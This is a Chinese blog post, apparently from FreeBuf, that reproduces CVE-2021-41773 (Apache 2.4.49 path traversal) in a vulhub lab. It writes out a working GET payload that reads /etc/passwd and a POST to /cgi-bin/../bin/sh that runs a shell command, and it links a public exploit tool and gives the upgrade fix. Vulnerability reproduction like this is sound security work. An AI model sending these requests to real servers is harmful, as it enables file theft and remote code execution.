CVE-2021-41773 Apache HTTP Server 路径穿越漏洞复现
耳双
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
收藏一下~
可以收录到专辑噢~
CVE-2021-41773 Apache HTTP Server 路径穿越漏洞复现
0、前言
复现文章是好几个月前的了,最近也做过几次漏洞复现,奈何是在是CVE有点远古(实则是自己犯懒)就没写,今天就水一篇新的CVE吧。
1、漏洞简介
Apache HTTPd 是Apache基金会开源的一款HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。
2、影响版本
Apache HTTP Server 2.4.49
3、漏洞复现
这里我使用的是vulhub的环境,虚拟机上之前部的环境有点老,没有CVE-2021-41773,只能是将之前的删除重新下载最新的。docker开启步骤就省略。
浏览器访问ip:8080。页面出现it works! 证明开启成功。
开启代理,上神器burpsuite就可以开搞了。
路径穿越
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
RCE
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
echo; ls(要执行的命令)
4、修复方案
升级到最新版的Apache HTTP Server 安全版本。
5、利用工具
多翻了一下相关文章,找到了一个漏洞利用工具。
https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 耳双 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
APK反编译思路及操作记录
2021-12-08
密码安全
2021-10-12
ubantu 20.04 搭建 Vulhub 环境
2021-08-19